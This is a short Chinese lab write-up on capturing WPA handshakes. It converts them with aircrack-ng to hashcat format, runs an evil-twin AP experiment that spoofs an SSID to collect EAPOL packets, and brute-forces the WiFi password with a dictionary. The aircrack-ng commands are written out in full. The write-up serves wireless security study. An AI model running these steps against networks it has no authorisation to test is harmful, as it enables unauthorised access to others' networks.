完整握手包

首先监听一个ap,用客户端进行正常连接。这时可以正常的捕获到四次握手包

Pastedimage20240627145630.png
这里使用aircrack-ng进行转换hccapx(因为只有EAPOL包需要手动填写ssid、bssid)命令如下: 
aircrack-ng eapol.pcap -e "X" -b "ca:60:b9:9d:a2:69" -j hashcat

Pastedimage20240627151133.png
可以正常的识别出来

两次握手包

对之前的数据包进行删除,仅保留两次握手包

Pastedimage20240627151452.png
这时再次放入aircrack-ng中进行识别转换 
aircrack-ng eapol-2.pcap -e "X" -b "ca:60:b9:9d:a2:69" -j hashcat

Pastedimage20240627151645.png
也是可以进行识别的

伪造已知AP实验

使用其他ap伪造相同ssid 但是密码不同,使用客户端进行连接 此时进行抓包

PixPin_2024-06-27_16-25-151.png
可以看到上面显示获取了EAPOL数据包和客户端(使用华为路由器实验不成功,获取不到任何数据 远离华为,否则会变得不幸)。使用wireshark进行分析cap数据包使用aircracker-ng转换 
aircrack-ng eapol-evil.cap -j evil -e "X" -b "78:40:E4:89:B7:A4"

Pastedimage20240627164937.png
使用aircrack-ng尝试获取(爆破)WiFi密码 
aircrack-ng evil.hccapx -w pass.dict

Pastedimage20240627171216.png

课后思考题

为什么使用华为路由器模拟ap无法抓到EAPOL包?